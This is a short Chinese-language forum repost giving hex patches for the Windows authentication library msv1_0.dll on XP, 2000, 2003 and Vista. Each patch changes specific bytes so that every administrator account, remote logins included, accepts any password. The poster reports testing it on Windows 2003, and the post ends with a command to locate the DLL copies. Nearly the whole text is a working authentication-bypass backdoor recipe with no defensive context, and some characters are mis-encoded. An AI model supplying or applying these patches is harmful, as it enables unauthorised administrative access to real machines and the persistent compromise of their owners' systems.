我注:Win2003 CN SP1 測試通過,管理員任意密碼可以進入(重啟了一下)
估計是類似注冊碼暴力破解,關(guān)鍵跳轉(zhuǎn)改了一下。

from:http://1v1.name/

這東西再放都長毛了,放出來....精靈還寫了個利用工具,找不到了.回頭補上..

system32下 有個msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改為
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改為
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改為
E0 00 75 11 b0 01 8b 4D

2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改為
E0 00 0F 84 D0 B8 FF FF

vista rtm
F8 10 75 13 B0 01 8B 4D
修改為
E0 00 75 13 B0 01 8B 4D

都是前兩個字節(jié)改為
E0 00

全部管理員帳號無須密碼登陸
包括遠程登陸的

改兩個目錄的 msv1_0.dll 用16進制

dir /s c:\windows\msv1_0.dll